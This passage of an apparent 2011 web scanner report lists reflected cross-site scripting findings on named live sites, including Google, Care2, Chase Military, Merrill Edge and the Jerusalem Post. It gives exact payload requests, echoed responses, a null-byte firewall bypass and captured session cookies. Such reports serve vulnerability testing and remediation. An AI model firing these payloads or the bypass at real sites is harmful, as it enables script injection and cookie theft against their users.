var mydist='3'; var myaddress=''; var mystate=''; var mycity=''; var myzip='17a84</script><script>alert(1)</script>6bbb498c306'; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(8); var maptype ...[SNIP]...
The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script t ...[SNIP]... '; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8); var maptype = ''; var mapwidth= '552'; var mapheight= '500'; var zoomfirst = ''; var myversion = 'v53'; var dedupeList = 'navy'; var drivingDir = ''; var noOriginPoint = ''; var disclaimer = ''; var ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:07:40 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 76015
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78" s.server="www.care2.com" s.channel="Greenliving" s.pageType="" s.prop3="Greenliving" s.prop16="Unregistered" s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script> ...[SNIP]...
2.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.care2.com
Path: /greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <script type="text/javascript">
function loadCommentPage(page, numPerPage, itemID) { var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1'; var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?"; var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;
...[SNIP]...
2.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.care2.com
Path: /greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" /> ...[SNIP]...
2.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.care2.com
Path: /greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... -1555312', 'mouseover', function(){memberRollover.mem(this);;}); new CARE2.prime.PillManager('d9a3e6ff-1'); function onFacebookConnect() { var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form"; C2FBConnect.onConnect(pg); } FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm"); if($('newCommentForm')) {
var theForm = $('newCommentForm').getElementsB ...[SNIP]...
2.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.chasemilitary.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8517f";alert(1)//55b2694a95c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly
Date: Wed, 02 Feb 2011 22:16:44 GMT
Connection: close
The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68621
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 01:06:45 GMT
Connection: close
2.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.chasemilitary.com
Path: /Default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8d08";alert(1)//c9371ab82a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1
Host: www.chasemilitary.com
Proxy-Connection: keep-alive
Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 00:07:27 GMT
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bdade(a)d80aea01345 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close
2.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.google.com
Path: /advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close
The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:11:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close
2.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.invisionpower.com
Path: /products/board/features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- ?95e51--><a>1fddadebe75=1 --> ...[SNIP]...
2.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.invisionpower.com
Path: /products/nexus/features/store.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- store?5e722--><a>6ccf7c9b600=1 --> ...[SNIP]...
2.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.jpost.com
Path: /ArtsAndCulture/FoodAndWine/Article.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 117507
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:24:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id="ctl00_He ...[SNIP]... <iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&layout=button_count&show_faces=true&width=150&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h ...[SNIP]...
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
2.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.macaudailytimes.com.mo
Path: /times-lab/21109-Tragedy-our-Commons.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
2.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.merrilledge.com
Path: /m/pages/self-directed-investing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
